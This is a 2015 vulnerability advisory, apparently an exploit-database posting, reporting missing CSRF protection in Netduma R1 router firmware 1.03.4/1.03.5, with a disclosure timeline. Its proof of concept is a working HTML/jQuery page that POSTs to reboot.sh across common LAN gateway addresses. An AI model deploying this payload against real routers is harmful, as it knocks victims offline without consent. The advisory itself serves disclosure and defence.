Netduma R1 1.03.4 / 1.03.5 Cross Site Request Forgery
Posted on 30 December 2015
## Introduction Affected Product: Netduma R1 Router Affected Version(s): 1.03.4 and 1.03.5 Link: http://www.netduma.com/firmware/R1-v-1-03-4.sig Vendor Website: https://netduma.com/ Vulnerability Type: CSRF Remote Exploitable: Yes Reported to vendor: 11/19/2015 Disclosed to public: 12/29/2015 Credits: @joshchaney ## Vulnerability Summary There is no CSRF protection for any administrative actions, which would allow an attacker to modify router settings or reboot the router by getting the victim to visit an attacker controlled website. ## Proof of Concept Reboot router: <html> <head> <script src="https://ajax.googleapis.com/ajax/libs/jquery/2.1.4/jquery.min.js"></script> </head> <body> <script> var i = 1; while (i < 255) { $.post("http://192.168." + i + ".1/cgi-bin/reboot.sh"); i++; } </script> </body> </html> ## Report Timeline 11/19/2015 Informed vendor about issue through email 11/29/2015 Tweeted to vendor about issue 11/30/2015 Vendor tweeted that they would respond to email about issue 12/07/2015 Emailed known customer about issue who forwarded email to CEO 12/08/2015 CEO responded to email explaining he had passed the information to the lead developer 12/29/2015 Disclosed to public for lack of acknowledgement of issue
